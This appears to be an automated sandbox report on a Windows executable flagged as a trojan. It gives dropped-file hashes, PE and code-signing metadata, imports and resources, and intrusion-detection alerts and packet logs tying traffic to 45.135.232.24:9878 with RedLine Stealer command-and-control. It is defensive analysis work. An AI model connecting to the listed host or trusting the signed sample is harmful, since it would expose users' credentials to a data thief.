                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):49152
                                                  Entropy (8bit):0.7864762418515975
                                                  Encrypted:false
                                                  SSDEEP:12:JSbX72FjJCXAlfLIlHuRp1hG7777777777777777777777777ZDHF0buM1MQ7tWv:J8UIwI6FzcO2tFF
                                                  MD5:0F34013FDABF2F445620C6D05511DDAA
                                                  SHA1:D15B5FD9FB2D82E95C5579422251E1865E26B6E2
                                                  SHA-256:CBE2A0D8362A8786D08D26E7F4D65DD5007CC0664C48236C3135D4DA1B6C4285
                                                  SHA-512:0D54C2C7B77DE112B9C1927895A443070DCA64EB8FC397EBBA25F312BE50CA86879F8E947E8D72B2835B65CC2250B4B66C7A1BE2ED89CE97A8CC2B9EA77C375E
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):1.343539588200702
                                                  Encrypted:false
                                                  SSDEEP:48:IxOuHthPIFX4RT53DoQJZUQs/HDDWSKQi/HDD8AEKgCykVFDVYLk3QxSKQbT0r:AOMIST5/4qtnkCrsLx
                                                  MD5:F2FC36AFA55BE7E1091773027A2038C2
                                                  SHA1:5CDAF053D9C82E341A24A28BBB538E6B1CA12E5F
                                                  SHA-256:5EBADACACC4FFB79919354FD169445C8480EF3D44FA9CEAFC5A21634B28026C3
                                                  SHA-512:C1098851B4938F49B7FA42B37D4D712B0D03D039B8D404BC6EDB0BBED7576140B1F5CD51CD6BCE8056AC2774F2914D8CBAF4F46555A8B1831D77F124F050C17F
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):404314
                                                  Entropy (8bit):5.400358247596047
                                                  Encrypted:false
                                                  SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFK:i0LVlABOYCe6+k
                                                  MD5:068A5666AA000619DC5352410BE00F1D
                                                  SHA1:F5F90FBC780676B9FE90414460884B6E4961137C
                                                  SHA-256:0229C849C8A506F184FF89F673BF6E4ABAAC3E7E7D11DFCFFFEB881DAE8AE3B0
                                                  SHA-512:2F3051D26E29A1033AFAE0CF36330F18E4A061E753AB260FECC6CC06096930571052AFD7B6F6E66BA0C765E69D8A4DC511AD1473CE519CEF5640E352C73D9BC9
                                                  Malicious:false
                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):81920
                                                  Entropy (8bit):0.1673543826685183
                                                  Encrypted:false
                                                  SSDEEP:48:hyRT2QxSKQYQs/HDDWSKQi/HDD8AEKgCykVFDVYLkK8iQ:hyJqtnkCrsW
                                                  MD5:5D3B9A885F8E94527C48C2067CCE8CF3
                                                  SHA1:34A30E730AD23A13B22F02689769A7420D06C9EB
                                                  SHA-256:F8CC0333C7BAC3DD10A3266B8772FF2461B927C6A0D746C8BC149789AD05E9AC
                                                  SHA-512:51F1F35426DC9DEF20D4BA3C478AB0971C4F805E2F2115F72BE2EB526040D483CEF6B6E1509760064CC82F0CB8180EED992B11218A272B422C5136442AD98A62
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):0.09732975350377866
                                                  Encrypted:false
                                                  SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKO0bu9xsZpiMtsW0FQT8KEojytOby4lSVky6lWf1:50i8n0itFzDHF0buM1MQ7tWObdzWd
                                                  MD5:017120DE836CF251613B70DAE84B5F64
                                                  SHA1:FBE863C57273C0AFC9427C67148D34CFD57E75B5
                                                  SHA-256:CD3FD6AA4710FCE6FF0B55B9C744E9252DBD5896D604D8A50658AFDE2E022051
                                                  SHA-512:800D3C9890BCE9F0A96469FB63CD8FAA46FBDC79A24AC0F43AB3A2713F7F6FC5A6F9A91F4B790F8B762AF5D35D3B330C50F341625D75F8477FBE68934F130461
                                                  Malicious:false
Preview: (preview window contains only non-printable bytes)
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):6.993502133196768
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 98.81%
                                                  • Windows ActiveX control (116523/4) 1.15%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File size:7'465'048 bytes
                                                  MD5:19124312cafa0b1c5524329755a5d6a2
                                                  SHA1:ccd8c01b210b26cd708a3e4cc49de45fed9abac1
                                                  SHA256:0190e867668e9be091e3d52261b62ef9b65059565ec17168813f82e7693af2fd
                                                  SHA512:4ffea24d0c03281afb06a23424e0a22a4407d7ce7fb80462aa8f9fa6adf4b33d5cd6e3f72943f6a1ca21cb26395922ded207605b5e95b04e9f3bd65443d98b9b
                                                  SSDEEP:98304:Uw5gk9MwZAN5CWj5QrOZAzojo6VE3re7a6fXG44ngx5fVD2InA:H5gk9KH9q4SKaSG44nUtyIA
                                                  TLSH:02769D217286C43BD56A01B1692CDA9F5228BF720B7154D7B3DC3E3F5AB48C21636E27
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..j#..9#..9#..9...8...9...8...9...8"..9l..80..9l..8:..9l..8J..9...89..9...8 ..9...8"..9#..9...9...8[..9..}9"..9#..9"..9...8"..
                                                  Icon Hash:b8868baba9aba2d8
                                                  Entrypoint:0x5d0974
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6399D230 [Wed Dec 14 13:40:00 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:8708d1fe1b5ff509570e29ce51663405
                                                  Signature Valid:true
                                                  Signature Issuer:CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
                                                  Signature Validation Error:The operation completed successfully
                                                  Error Number:0
                                                  Not Before, Not After
                                                  • 5/19/2023 8:32:29 AM 5/17/2024 8:32:29 AM
                                                  Subject Chain
                                                  • CN=IMPERIOUS TECHNOLOGIES LIMITED, O=IMPERIOUS TECHNOLOGIES LIMITED, L=Ringwood, C=GB
                                                  Version:3
                                                  Thumbprint MD5:C9CEC5817E76867C2EFE9D2B497007B6
                                                  Thumbprint SHA-1:21A97512A2959B0E74729BE220102AEF1DCF56FD
                                                  Thumbprint SHA-256:8ED289FCC40BBC150A52B733123F6094CCFB2C499D6E932B0D9A6001490FB7E6
                                                  Serial:3AB74A2EBF93447ADB83554B5564FE03
                                                  Instruction
                                                  call 00007F3F34C0F67Bh
                                                  jmp 00007F3F34C0EEAFh
                                                  mov ecx, dword ptr [ebp-0Ch]
                                                  mov dword ptr fs:[00000000h], ecx
                                                  pop ecx
                                                  pop edi
                                                  pop edi
                                                  pop esi
                                                  pop ebx
                                                  mov esp, ebp
                                                  pop ebp
                                                  push ecx
                                                  ret
                                                  mov ecx, dword ptr [ebp-10h]
                                                  xor ecx, ebp
                                                  call 00007F3F34C0E503h
                                                  jmp 00007F3F34C0F012h
                                                  push eax
                                                  push dword ptr fs:[00000000h]
                                                  lea eax, dword ptr [esp+0Ch]
                                                  sub esp, dword ptr [esp+0Ch]
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [eax], ebp
                                                  mov ebp, eax
                                                  mov eax, dword ptr [006E4020h]
                                                  xor eax, ebp
                                                  push eax
                                                  push dword ptr [ebp-04h]
                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  mov dword ptr fs:[00000000h], eax
                                                  ret
                                                  push eax
                                                  push dword ptr fs:[00000000h]
                                                  lea eax, dword ptr [esp+0Ch]
                                                  sub esp, dword ptr [esp+0Ch]
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [eax], ebp
                                                  mov ebp, eax
                                                  mov eax, dword ptr [006E4020h]
                                                  xor eax, ebp
                                                  push eax
                                                  mov dword ptr [ebp-10h], eax
                                                  push dword ptr [ebp-04h]
                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  mov dword ptr fs:[00000000h], eax
                                                  ret
                                                  push eax
                                                  push dword ptr fs:[00000000h]
                                                  lea eax, dword ptr [esp+0Ch]
                                                  sub esp, dword ptr [esp+0Ch]
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [eax], ebp
                                                  mov ebp, eax
                                                  mov eax, dword ptr [006E4020h]
                                                  xor eax, ebp
                                                  push eax
                                                  mov dword ptr [ebp-10h], esp
                                                  push dword ptr [ebp-04h]
                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  mov dword ptr fs:[00000000h], eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e223c | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2f1000 | 0x20bbc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x71bfd0 | 0x2888 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x312000 | 0x279d0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x288188 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x288200 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x259d50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x258000 | 0x2e8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2df5e8 | 0x260 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2565c6 | 0x256600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x258000 | 0x8b322 | 0x8b400 | False | 0.3123246745960503 | data | 4.589889619444622 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2e4000 | 0xcf40 | 0x3a00 | False | 0.2693292025862069 | data | 4.761885688726732 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2f1000 | 0x20bbc | 0x20c00 | False | 0.1356303673664122 | data | 5.260618272073059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x312000 | 0x279d0 | 0x27a00 | False | 0.4465817231861199 | data | 6.521615115365491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x2f18e0 | 0x13e | Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors | English | United States | 0.25471698113207547
RT_BITMAP | 0x2f1a20 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 0 | English | United States | 0.03017241379310345
RT_BITMAP | 0x2f2248 | 0x48a8 | Device independent bitmap graphic, 290 x 16 x 32, image size 0 | English | United States | 0.11881720430107527
RT_BITMAP | 0x2f6af0 | 0xa6a | Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m | English | United States | 0.21680420105026257
RT_BITMAP | 0x2f755c | 0x152 | Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors | English | United States | 0.5295857988165681
RT_BITMAP | 0x2f76b0 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 0 | English | United States | 0.4875478927203065
RT_ICON | 0x2f7ed8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.16129032258064516
RT_ICON | 0x2f81c0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.32094594594594594
RT_ICON | 0x2f82e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.16463414634146342
RT_ICON | 0x2f9390 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.18565573770491803
RT_ICON | 0x2f9d18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3262411347517731
RT_DIALOG | 0x2fa180 | 0xac | data | English | United States | 0.7151162790697675
RT_DIALOG | 0x2fa22c | 0xcc | data | English | United States | 0.6911764705882353
RT_DIALOG | 0x2fa2f8 | 0x1b4 | data | English | United States | 0.5458715596330275
RT_DIALOG | 0x2fa4ac | 0x136 | data | English | United States | 0.6064516129032258
RT_DIALOG | 0x2fa5e4 | 0x4c | data | English | United States | 0.8289473684210527
RT_STRING | 0x2fa630 | 0x234 | data | English | United States | 0.4645390070921986
RT_STRING | 0x2fa864 | 0x182 | data | English | United States | 0.5103626943005182
RT_STRING | 0x2fa9e8 | 0x50 | data | English | United States | 0.7375
RT_STRING | 0x2faa38 | 0x9a | data | English | United States | 0.37662337662337664
RT_STRING | 0x2faad4 | 0x2f6 | data | English | United States | 0.449868073878628
RT_STRING | 0x2fadcc | 0x5c0 | data | English | United States | 0.3498641304347826
RT_STRING | 0x2fb38c | 0x3c2 | data | English | United States | 0.35343035343035345
RT_STRING | 0x2fb750 | 0x100 | data | English | United States | 0.5703125
RT_STRING | 0x2fb850 | 0x484 | data | English | United States | 0.39186851211072665
RT_STRING | 0x2fbcd4 | 0x1ea | data | English | United States | 0.44081632653061226
RT_STRING | 0x2fbec0 | 0x18a | data | English | United States | 0.5228426395939086
RT_STRING | 0x2fc04c | 0x216 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.46254681647940077
RT_STRING | 0x2fc264 | 0x624 | data | English | United States | 0.3575063613231552
RT_STRING | 0x2fc888 | 0x660 | data | English | United States | 0.3474264705882353
RT_STRING | 0x2fcee8 | 0x2e2 | data | English | United States | 0.4037940379403794
RT_GROUP_ICON | 0x2fd1cc | 0x22 | data | English | United States | 1.0
RT_VERSION | 0x2fd1f0 | 0x2dc | data | English | United States | 0.44672131147540983
RT_HTML | 0x2fd4cc | 0x3835 | ASCII text, with very long lines (443), with CRLF line terminators | English | United States | 0.08298005420807561
RT_HTML | 0x300d04 | 0x1316 | ASCII text, with CRLF line terminators | English | United States | 0.18399508800654932
RT_HTML | 0x30201c | 0x52b | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.36281179138321995
RT_HTML | 0x302548 | 0x6acd | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.10679931238798873
RT_HTML | 0x309018 | 0x6a2 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.3486454652532391
RT_HTML | 0x3096bc | 0x104a | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.2170263788968825
RT_HTML | 0x30a708 | 0x15b1 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.17612101566720692
RT_HTML | 0x30bcbc | 0x205c | exported SGML document, ASCII text, with very long lines (659), with CRLF line terminators | English | United States | 0.13604538870111058
RT_HTML | 0x30dd18 | 0x368d | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.10834228428213391
RT_MANIFEST | 0x3113a8 | 0x813 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.41025641025641024
DLL | Import
KERNEL32.dll | CreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, MoveFileW, GetLastError, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateProcessW, GetExitCodeProcess, GetWindowsDirectoryW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, LocalFree, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, LocalAlloc, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, GetProcessAffinityMask, GetModuleHandleA, GlobalMemoryStatus, ReleaseSemaphore, CreateSemaphoreW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/21/23-19:35:51.013900 | TCP | 2046105 | ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
08/21/23-19:35:51.481894 | TCP | 2046045 | ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
08/21/23-19:35:54.924171 | TCP | 2046056 | ET TROJAN Redline Stealer Activity (Response) | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
08/21/23-19:35:51.013900 | TCP | 2046045 | ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
08/21/23-19:35:54.854691 | TCP | 2046105 | ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Aug 21, 2023 19:51:33.209738970 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.209762096 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.209795952 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.209847927 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.209917068 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.210019112 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.210040092 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.210057974 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.210076094 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.210077047 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.210097075 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.210150957 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.271786928 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.271948099 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.271950960 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.271979094 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.271998882 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272020102 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272032976 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272038937 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272059917 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272078991 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272145987 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272181034 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272212029 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272212029 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272285938 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272309065 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272329092 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272499084 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272526026 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272547960 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272567034 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272586107 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272604942 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272666931 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272666931 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272694111 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272694111 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272722006 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.272732973 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272753954 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272764921 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272775888 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.272973061 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.334120989 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334158897 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334177971 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334193945 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334213972 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334302902 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.334305048 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334465027 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334486008 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334505081 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334619999 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334640026 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334690094 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334707975 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334736109 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334752083 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334834099 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.334851980 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335078955 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335097075 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335113049 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335129976 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335146904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335185051 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.335289001 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.335356951 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335376024 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335392952 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335410118 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335513115 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335530043 CEST98784974745.135.232.24192.168.2.3
